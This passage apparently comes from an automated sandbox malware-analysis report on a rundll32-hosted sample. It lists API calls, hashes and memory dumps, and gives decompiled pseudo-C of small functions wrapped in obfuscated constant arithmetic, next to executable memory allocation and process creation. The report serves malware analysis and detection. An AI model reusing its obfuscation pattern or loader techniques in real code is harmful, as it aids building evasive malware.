Instruction Fuzzy Hash: 31616A746052009FD780EF68ED86E3937A3FB48318B10A01AF58A9B371DB76A944CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 006C1638, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DdeInitializeA.USER32(00000044,Function_0003D428,00000000,00000000), ref: 006C1686

Strings

Link, xrefs: 006C1666

Memory Dump Source

Source File: 0000000D.00000002.2102981385.0000000000684000.00000020.00020000.sdmp, Offset: 00684000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_684000_rundll32.jbxd

Similarity

API ID: Initialize
String ID: Link
API String ID: 2538663250-2526951119
Opcode ID: e47805098ed6148793fc528bad1c171ccb9d41ca85833216d9a150f50f148b51
Instruction ID: 54934f373022cbaec2d1abaf312d619c41753d7c731cb07d8cfade61b6725eb6
Opcode Fuzzy Hash: e47805098ed6148793fc528bad1c171ccb9d41ca85833216d9a150f50f148b51
Instruction Fuzzy Hash: 6F118C70600740ABD764EB75DD82F6E77E7EF06700B91583CF404DBB92EA72AA408799

Uniqueness

Uniqueness Score: -1.00%

Function 001D0540, Relevance: 3.3, APIs: 2, Instructions: 252
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 001D058F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 001D07D9

Memory Dump Source

Source File: 0000000D.00000002.2102745390.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction ID: be571fffd9363213e7bfa9151a8a10371ffd4c7cbcdbfab7d7b33c0e53ef1bc3
Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction Fuzzy Hash: AEC196B5A002099FCB48CF98C590EAEB7B5BF8C304F248159E949AB355D735EE42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 006C1A14, Relevance: 3.1, APIs: 2, Instructions: 56
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006C1AC8: DdeFreeStringHandle.USER32(?,?), ref: 006C1AE8

DdeCreateStringHandleA.USER32(?,00000000), ref: 006C1A82
DdeNameService.USER32(?,00000000,00000000,00000001), ref: 006C1A95

Memory Dump Source

Source File: 0000000D.00000002.2102981385.0000000000684000.00000020.00020000.sdmp, Offset: 00684000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_684000_rundll32.jbxd

Similarity

API ID: HandleString$CreateFreeNameService
String ID:
API String ID: 374373348-0
Opcode ID: 2d2b585a773a0a49103c3bec3530295e36f09650a926daa77180bc1683c973fd
Instruction ID: 8e3f7fbc2483e94758d555ca73ba5f1688d5933fae9137822803c8893fa4c178
Opcode Fuzzy Hash: 2d2b585a773a0a49103c3bec3530295e36f09650a926daa77180bc1683c973fd
Instruction Fuzzy Hash: 68113C31711254AFDB91EAA4C892F6A37AEEF4AB00B5115A9F9009B247DA71ED008798

Uniqueness

Uniqueness Score: -1.00%

Function 001D0020, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001D00A4

Strings

VirtualAlloc, xrefs: 001D0089, 001D008C

Memory Dump Source

Source File: 0000000D.00000002.2102745390.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction ID: c825b7ca224d40c1d283d61c79ea0474ffbccbf973443e583a7729f74b971a16
Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction Fuzzy Hash: 41110060D082C9EAEF01D7E89409BFEBFB55B25704F044098E6446A282D7BA575887A6

Uniqueness

Uniqueness Score: -1.00%

Function 0067F2F9, Relevance: 1.6, APIs: 1, Instructions: 72
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 30%

			E0067F2F9(void* __edx, WCHAR* _a8, WCHAR* _a12, int _a16, struct _STARTUPINFOW* _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, struct _PROCESS_INFORMATION* _a56) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t64;
				signed int _t65;

				_push(_a56);
				_push(0);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(0);
				E006656B2(_t54);
				_v28 = 0x170c99;
				_v24 = 0;
				_v16 = 0x438d;
				_v16 = _v16 ^ 0x1c0fc040;
				_v16 = _v16 + 0xffffa13b;
				_v16 = _v16 ^ 0x1c0f1065;
				_v8 = 0x7b12;
				_v8 = _v8 + 0xe48b;
				_v8 = _v8 << 2;
				_t65 = 0x70;
				_push(0xf9b1620b);
				_v8 = _v8 * 0x77;
				_v8 = _v8 ^ 0x028dd8b4;
				_v20 = 0x8aa6;
				_v20 = _v20 + 0x376a;
				_v20 = _v20 ^ 0x0000ade9;
				_v12 = 0x19;
				_push(0x90aa198d);
				_v12 = _v12 / _t65;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x00005708;
				E006704D5(0x2ee, _v12 % _t65);
				_t64 = CreateProcessW(_a8, _a12, 0, 0, _a16, 0, 0, 0, _a20, _a56); // executed
				return _t64;
			}

0x0067f300
0x0067f305
0x0067f306
0x0067f307
0x0067f30a
0x0067f30d
0x0067f310
0x0067f311
0x0067f314
0x0067f317
0x0067f31a
0x0067f31d
0x0067f320
0x0067f323
0x0067f325
0x0067f326
0x0067f32b
0x0067f335
0x0067f33a
0x0067f341
0x0067f348
0x0067f34f
0x0067f356
0x0067f35d
0x0067f364
0x0067f36e
0x0067f36f
0x0067f377
0x0067f37a
0x0067f381
0x0067f388
0x0067f38f
0x0067f396
0x0067f3a2
0x0067f3a7
0x0067f3af
0x0067f3b3
0x0067f3c6
0x0067f3e2
0x0067f3e8

APIs

CreateProcessW.KERNEL32(1C0F1065,0000ADE9,00000000,00000000,?,00000000,00000000,00000000,00170C99,?), ref: 0067F3E2

Memory Dump Source

Source File: 0000000D.00000002.2102924374.0000000000660000.00000040.00020000.sdmp, Offset: 00660000, based on PE: true

Associated: 0000000D.00000002.2102962766.0000000000681000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.2102971018.0000000000683000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_660000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 026aef61d0656430dbbcca425602156f2ab332a660c9be10ca3ab0af62cf9408
Instruction ID: e4cd9a62775c285214244c304eaf753494bf5ecdc72fc13697ca6e63f6625ea3
Opcode Fuzzy Hash: 026aef61d0656430dbbcca425602156f2ab332a660c9be10ca3ab0af62cf9408
Instruction Fuzzy Hash: 2C31EF72901218FBDF51DEA5C90A8DEBFB5FF08354F108188F91866260D3768A64EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00661D54, Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00661E0C

Memory Dump Source

Source File: 0000000D.00000002.2102924374.0000000000660000.00000040.00020000.sdmp, Offset: 00660000, based on PE: true

Associated: 0000000D.00000002.2102962766.0000000000681000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.2102971018.0000000000683000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_660000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 7893705023e0342a7cd03c01fb48380ada36fa37b15ddf495c5e823a11f917f8
Instruction ID: da2c1b4b34375c9a1119bf19c9e3fc8c48f71ec99da8e901531ffc2d41e45340
Opcode Fuzzy Hash: 7893705023e0342a7cd03c01fb48380ada36fa37b15ddf495c5e823a11f917f8
Instruction Fuzzy Hash: FC213072C01218ABDF01AFE4CC4A8EEBFB5FB05318F108088F914622A0D3799A20DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0066CD27, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 39%

			E0066CD27() {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _t48;

				_v20 = 0x9362;
				_v20 = _v20 << 3;
				_v20 = _v20 + 0x3ac5;
				_v20 = _v20 ^ 0x0004a93d;
				_v16 = 0x2d14;
				_v16 = _v16 | 0xd3f48c41;
				_v16 = _v16 >> 5;
				_v16 = _v16 ^ 0x069fac5e;
				_v12 = 0xc5b1;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0x469c37c1;
				_t48 = 0x70;
				_push(0xf9b1620b);
				_v12 = _v12 / _t48;
				_v12 = _v12 ^ 0x00a22cf4;
				_v8 = 0x5bb6;
				_v8 = _v8 >> 4;
				_v8 = _v8 | 0x6c69259f;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x0000087c;
				_push(0xa43506f8);
				E006704D5(0x16b, _v12 % _t48);
				ExitProcess(0);
			}

0x0066cd2d
0x0066cd36
0x0066cd3a
0x0066cd41
0x0066cd48
0x0066cd4f
0x0066cd56
0x0066cd5a
0x0066cd61
0x0066cd68
0x0066cd6c
0x0066cd78
0x0066cd7b
0x0066cd80
0x0066cd86
0x0066cd92
0x0066cd99
0x0066cd9d
0x0066cda4
0x0066cda8
0x0066cdbb
0x0066cdc0
0x0066cdca

APIs

ExitProcess.KERNEL32(00000000), ref: 0066CDCA

Memory Dump Source

Source File: 0000000D.00000002.2102924374.0000000000660000.00000040.00020000.sdmp, Offset: 00660000, based on PE: true

Associated: 0000000D.00000002.2102962766.0000000000681000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.2102971018.0000000000683000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_660000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 2e9f4816a751cc7b3e2e4233dde82b2bf974ba370e125a65ab7361591f6c0db6
Instruction ID: 72e7f99982cd77d21cc272692345b0f113d5d91445a7e4fe2086e0713935d5a8
Opcode Fuzzy Hash: 2e9f4816a751cc7b3e2e4233dde82b2bf974ba370e125a65ab7361591f6c0db6
Instruction Fuzzy Hash: 12112771D0060CEBEB48DFE8C84A59EBBB0FB00708F208599D526A7294C3B51B48DF81

Uniqueness

Uniqueness Score: -1.00%

Function 0066D867, Relevance: 1.3, APIs: 1, Instructions: 44
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 27%

			E0066D867(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t32;
				int _t39;
				void* _t41;
				WCHAR* _t43;

				_push(_a16);
				_t43 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006656B2(_t32);
				_v20 = 0xc112;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x00187660;
				_v16 = 0x44a2;
				_v16 = _v16 << 0x10;
				_v16 = _v16 ^ 0x44a20c46;
				_v8 = 0x80d5;
				_v8 = _v8 << 6;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0x406aec0c;
				_v12 = 0x3c7d;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x000035cf;
				_push(0xf9b1620b);
				_push(0x903a0366);
				_t41 = 0x28;
				E006704D5(_t41, __edx);
				_t39 = lstrcmpiW(_a4, _t43); // executed
				return _t39;
			}

0x0066d86e
0x0066d871
0x0066d873
0x0066d876
0x0066d879
0x0066d87c
0x0066d87d
0x0066d87e
0x0066d883
0x0066d88d
0x0066d891
0x0066d898
0x0066d89f
0x0066d8a3
0x0066d8aa
0x0066d8b1
0x0066d8b5
0x0066d8b9
0x0066d8c0
0x0066d8c7
0x0066d8cb
0x0066d8de
0x0066d8e6
0x0066d8ed
0x0066d8ee
0x0066d8fa
0x0066d900

APIs

lstrcmpiW.KERNELBASE(000035CF,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0066D8FA

Memory Dump Source

Source File: 0000000D.00000002.2102924374.0000000000660000.00000040.00020000.sdmp, Offset: 00660000, based on PE: true

Associated: 0000000D.00000002.2102962766.0000000000681000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.2102971018.0000000000683000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_660000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 5112a81a2239dc82ca800b34fc2509730bf944e1d5fe2a59776ea9b54c5e6d15
Instruction ID: ebdbd246d274036237dfdbf885aa6bb3f81628fd8dea37bcf4a5be06d80564bf
Opcode Fuzzy Hash: 5112a81a2239dc82ca800b34fc2509730bf944e1d5fe2a59776ea9b54c5e6d15
Instruction Fuzzy Hash: 0711E272C01218ABEF51EFE4C90A8DEBBB5FB04354F108598E92566251D7B58B24DF81

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00688330, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetMonitorInfoA.USER32(?,?), ref: 00688361
GetSystemMetrics.USER32(00000000), ref: 0068839D
GetSystemMetrics.USER32(00000001), ref: 006883A8

Strings

/}Au, xrefs: 0068839D, 006883A8
GetMonitorInfo, xrefs: 00688348
DISPLAY, xrefs: 006883C9

Memory Dump Source

Source File: 0000000D.00000002.2102981385.0000000000684000.00000020.00020000.sdmp, Offset: 00684000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_684000_rundll32.jbxd

Similarity

API ID: MetricsSystem$InfoMonitor
String ID: /}Au$DISPLAY$GetMonitorInfo
API String ID: 4250584380-1428758730
Opcode ID: 985cb2420d2e0f1d3194dea2d2f164a6d756dbd3672025d506c2427907564737
Instruction ID: e8f3d7f36d9aa246b5fa4e05c227bb8a58d3a2fdcbb86e6f32301604f52c9f88
Opcode Fuzzy Hash: 985cb2420d2e0f1d3194dea2d2f164a6d756dbd3672025d506c2427907564737
Instruction Fuzzy Hash: C611B1716017059FD720AFA4DC44BB7B7EAEF45B10F404629FD46D7240DBB0A8048BA8

Uniqueness

Uniqueness Score: -1.00%

Function 006885AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 006885E5
GetSystemMetrics.USER32(00000000), ref: 0068860A
GetSystemMetrics.USER32(00000001), ref: 00688615

Strings

/}Au, xrefs: 0068860A, 00688615
EnumDisplayMonitors, xrefs: 006885C4

Memory Dump Source

Source File: 0000000D.00000002.2102981385.0000000000684000.00000020.00020000.sdmp, Offset: 00684000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_684000_rundll32.jbxd

Similarity

API ID: MetricsSystem$DisplayEnumMonitors
String ID: /}Au$EnumDisplayMonitors
API String ID: 1389147845-1105134141
Opcode ID: 890b023e2ee40ff9357b415012b2d5c68be0990ba9483ddbb53bdbd4129df463
Instruction ID: 7197ce4fab50fcaae3f587ef0411fdc3487dd51c3e45b7bfaf76280839711c09
Opcode Fuzzy Hash: 890b023e2ee40ff9357b415012b2d5c68be0990ba9483ddbb53bdbd4129df463
Instruction Fuzzy Hash: 54310CB2A01209AFDB50EFA4DC44EEF77BEAF45304F40462AF915E3201EA34D9418BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00688404, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 00688471
GetSystemMetrics.USER32(00000001), ref: 0068847C

Strings

/}Au, xrefs: 00688471, 0068847C
DISPLAY, xrefs: 0068849D
GetMonitorInfoA, xrefs: 0068841C

Memory Dump Source

Source File: 0000000D.00000002.2102981385.0000000000684000.00000020.00020000.sdmp, Offset: 00684000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_684000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$DISPLAY$GetMonitorInfoA
API String ID: 4116985748-2822609925
Opcode ID: 0a093aa5cca690734fa1d1287c9ceab82a6000c91d2e255bb7f662dc54700597
Instruction ID: 7b02a067823c573bd97e41a3f91a8886c94343fddda45d2df457cc5e7cfad6ea
Opcode Fuzzy Hash: 0a093aa5cca690734fa1d1287c9ceab82a6000c91d2e255bb7f662dc54700597
Instruction Fuzzy Hash: 5111E6326013069FD720EF60DC44BA7B7EBEF05720F404639FD559B281DB71A8448BA5

Uniqueness

Uniqueness Score: -1.00%

Function 006884D8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 00688545
GetSystemMetrics.USER32(00000001), ref: 00688550

Strings

/}Au, xrefs: 00688545, 00688550
DISPLAY, xrefs: 00688571
GetMonitorInfoW, xrefs: 006884F0

Memory Dump Source

Source File: 0000000D.00000002.2102981385.0000000000684000.00000020.00020000.sdmp, Offset: 00684000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_684000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$DISPLAY$GetMonitorInfoW
API String ID: 4116985748-1558784340
Opcode ID: bf6238627b5ca7e874d0188c4d50ee08bc2b7ee0b09d95908a41a4b5d0918d7d
Instruction ID: 8a4b7de7731e8e56eb39288251abfc20a0807a6f4fcfb17c35f6e6d1552ad2cb
Opcode Fuzzy Hash: bf6238627b5ca7e874d0188c4d50ee08bc2b7ee0b09d95908a41a4b5d0918d7d
Instruction Fuzzy Hash: F011D371A513059FD7A0EF64DC44BA7BBEAEF09310F44462AFD45D7240DB71A804CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00688298, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 006882E6
GetSystemMetrics.USER32(00000001), ref: 006882F8

Strings

/}Au, xrefs: 006882E6, 006882F8
MonitorFromPoint, xrefs: 006882AA

Memory Dump Source

Source File: 0000000D.00000002.2102981385.0000000000684000.00000020.00020000.sdmp, Offset: 00684000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_684000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$MonitorFromPoint
API String ID: 4116985748-3670600901
Opcode ID: 28d200aade9d2c3727ccc5ee122977ab6a158e1eabe209843976aeb30cf440a2
Instruction ID: 637a3be62799796911ccf3203366fb9ce2094ad0d575abccb030441aa6764cb0
Opcode Fuzzy Hash: 28d200aade9d2c3727ccc5ee122977ab6a158e1eabe209843976aeb30cf440a2
Instruction Fuzzy Hash: 9F01F431201349AFDB106F90DC44FAE7B97FB44B50F844229F9048B211CB70AD018BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00688170, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 006881C1
GetSystemMetrics.USER32(00000001), ref: 006881CD

Strings

/}Au, xrefs: 006881C1, 006881CD
MonitorFromRect, xrefs: 00688185

Memory Dump Source

Source File: 0000000D.00000002.2102981385.0000000000684000.00000020.00020000.sdmp, Offset: 00684000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_684000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$MonitorFromRect
API String ID: 4116985748-120404372
Opcode ID: 7856397562686cd60f72166309f792dd0dc32bb102cdb65673f1cc3cdb5b0322
Instruction ID: 07e803cd1c15b05736c40e3b5f960fa27f695a6f3ca9d1d9b2f536beaf226598
Opcode Fuzzy Hash: 7856397562686cd60f72166309f792dd0dc32bb102cdb65673f1cc3cdb5b0322
Instruction Fuzzy Hash: 4B014B312002169FD720AB14DC89FA7BB9BEB40791F949266ED44DB203CE71DC428BB5

Uniqueness

Uniqueness Score: -1.00%

Function 006C2B38, Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

DdeCreateStringHandleA.USER32(00000015,00000000), ref: 006C2B7C
DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 006C2BA9
DdeGetLastError.USER32(00000015), ref: 006C2BBB
DdeFreeStringHandle.USER32(00000015,?), ref: 006C2BCD

Memory Dump Source

Source File: 0000000D.00000002.2102981385.0000000000684000.00000020.00020000.sdmp, Offset: 00684000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_684000_rundll32.jbxd

Similarity

API ID: HandleString$ClientCreateErrorFreeLastTransaction
String ID:
API String ID: 2421758087-0
Opcode ID: 379bf1f3617b3b0b477e5a6793d95844e23dfbf1b1e783b436e9378da3f430a7
Instruction ID: 56ef9b4bef13c48f502bbd93859d8de64fadec51e93dd17ed139512b698c91f9
Opcode Fuzzy Hash: 379bf1f3617b3b0b477e5a6793d95844e23dfbf1b1e783b436e9378da3f430a7
Instruction Fuzzy Hash: 8F2117752042419FEB40DF68C8C1FAAB7E9EB49310F149199F998CF2A6DB71EC40CB64

Uniqueness

Uniqueness Score: -1.00%

Function 006C1428, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 169COMMON

Download Yara Rule

APIs

DdeQueryConvInfo.USER32(?,?,00000060), ref: 006C14BF

Strings

`, xrefs: 006C1498
0l, xrefs: 006C1607

Memory Dump Source

Source File: 0000000D.00000002.2102981385.0000000000684000.00000020.00020000.sdmp, Offset: 00684000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_684000_rundll32.jbxd

Similarity

API ID: ConvInfoQuery
String ID: 0l$`
API String ID: 701148680-4113112389
Opcode ID: 107b8b371491e8091d0ed8dea79d0152f06033688ae40495105420b66cf5f585
Instruction ID: 0f9e6093cab2d531491b277962a46c147f3880fa0bf7a1169d61a86b6c3e7727
Opcode Fuzzy Hash: 107b8b371491e8091d0ed8dea79d0152f06033688ae40495105420b66cf5f585
Instruction Fuzzy Hash: B2515376A0021A8B8B04DF69D985EBE73F7EB4B350F14802CF906DB342CA34DD0287A4

Uniqueness

Uniqueness Score: -1.00%

Function 006880E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(?), ref: 00688110

Strings

/}Au, xrefs: 006880FD, 0068810A, 00688110
GetSystemMetrics, xrefs: 006880F8

Memory Dump Source

Source File: 0000000D.00000002.2102981385.0000000000684000.00000020.00020000.sdmp, Offset: 00684000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_684000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$GetSystemMetrics
API String ID: 4116985748-3773086709
Opcode ID: 6f200e7827820f051cae1e73f48bef3f2a1962d621f5b61b88e7a95dddd0b1ed
Instruction ID: 69e404f128b7fa222ad104a34233d9a16bed5557cba8a3fe7eb7e4b127bd22a6
Opcode Fuzzy Hash: 6f200e7827820f051cae1e73f48bef3f2a1962d621f5b61b88e7a95dddd0b1ed
Instruction Fuzzy Hash: 16F090302152434EDB607B34DDCCA723547AB92338FE05B21B1A5472D5CE398C43835D

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 2844 Parent PID: 2448 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	4.5%
Dynamic/Decrypted Code Coverage:	4%
Signature Coverage:	0%
Total number of Nodes:	272
Total number of Limit Nodes:	16

Executed Functions

Function 00473928, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnhMetaFileA.GDI32(trty55345), ref: 004739C2
VirtualAlloc.KERNELBASE(00000000,00476CB4,00001000,00000040), ref: 00473A8E

Strings

|lG, xrefs: 00473961
trty55345, xrefs: 004739BD

Memory Dump Source

Source File: 0000000E.00000002.2107949566.0000000000434000.00000020.00020000.sdmp, Offset: 00434000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_434000_rundll32.jbxd

Similarity

API ID: AllocFileMetaVirtual
String ID: trty55345$|lG
API String ID: 2643768156-1821281307
Opcode ID: 3130202e462f7cc5550263aabea82dce620ebf56d3b4669a8b55639d85525ca6
Instruction ID: 7cfdf64c4d5f757b1d89b0236f194887930e7e241da24b37b40c41bac6f86404
Opcode Fuzzy Hash: 3130202e462f7cc5550263aabea82dce620ebf56d3b4669a8b55639d85525ca6
Instruction Fuzzy Hash: C3619070605A019FE752DF29EE86A5537A3F708309B12803AE58D8B271DF75A9C8DF0C

Uniqueness

Uniqueness Score: -1.00%

Function 0041BFA7, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileInformationByHandle.KERNELBASE(003F5F6C,00000000,00000000,00000028), ref: 0041C077

Strings

xk, xrefs: 0041BFCD
l_?, xrefs: 0041BFD6

Memory Dump Source

Source File: 0000000E.00000002.2107924027.0000000000410000.00000040.00020000.sdmp, Offset: 00410000, based on PE: true

Associated: 0000000E.00000002.2107940232.0000000000431000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.2107944736.0000000000433000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_410000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID: l_?$xk
API String ID: 3935143524-284769927
Opcode ID: f7ca304d10041dd62d8e1ad4bfbd78abde4e0d4be66e492d5acffa0649bbfc17
Instruction ID: 9e3ce35253908c9365e85b300e31fcd1651c41b31787ee50e020c2743875da47
Opcode Fuzzy Hash: f7ca304d10041dd62d8e1ad4bfbd78abde4e0d4be66e492d5acffa0649bbfc17
Instruction Fuzzy Hash: B22138B2D0030DEBEF41DFE4D94AA9EBBB1FB14314F108089E91076191E3B94B649F80

Uniqueness

Uniqueness Score: -1.00%

Function 004178F0, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 31%

			E004178F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t40;
				int _t49;
				signed int _t51;
				void* _t56;

				_push(_a12);
				_t56 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E004156B2(_t40);
				_v16 = 0x524d;
				_v16 = _v16 ^ 0x99c40e8a;
				_v16 = _v16 << 0xb;
				_v16 = _v16 ^ 0x22e67b2e;
				_v8 = 0x3b7d;
				_v8 = _v8 << 3;
				_v8 = _v8 << 5;
				_v8 = _v8 + 0xffff78bf;
				_v8 = _v8 ^ 0x003ae656;
				_v12 = 0xe9f0;
				_v12 = _v12 + 0xffff2fbb;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0x0000f034;
				_v20 = 0x1cdc;
				_t51 = 0x3d;
				_push(0xf9b1620b);
				_v20 = _v20 / _t51;
				_v20 = _v20 ^ 0x00004e2d;
				_push(0xd18a469);
				E004204D5(_t51 + 0x71, _v20 % _t51);
				_t49 = CloseHandle(_t56); // executed
				return _t49;
			}

APIs

CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000044), ref: 0041799B

Strings

V:, xrefs: 0041793D
.{", xrefs: 00417920

Memory Dump Source

Source File: 0000000E.00000002.2107924027.0000000000410000.00000040.00020000.sdmp, Offset: 00410000, based on PE: true

Associated: 0000000E.00000002.2107940232.0000000000431000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.2107944736.0000000000433000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_410000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: .{"$V:
API String ID: 2962429428-4012127490
Opcode ID: 7f2f5ecfd647bd061181deac43e7d57022e936a481046fe213cab76c0819ac8e
Instruction ID: d3e9f1d4f377a5e1723d45e9971ed88bd9c40d4ed3189ade1b236add8347ef6c
Opcode Fuzzy Hash: 7f2f5ecfd647bd061181deac43e7d57022e936a481046fe213cab76c0819ac8e
